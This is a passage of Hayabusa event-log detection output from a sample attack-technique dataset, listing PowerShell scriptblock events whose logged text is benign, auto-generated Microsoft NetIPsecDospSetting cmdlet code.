$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.444 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"etization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.444 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecDospSetting' -Alias '*' function Get-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecDospSetting' -Alias '*' function Set-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterT",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.444 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecDospSetting' -Alias '*' function Get-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecDospSetting' -Alias '*' function Set-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] 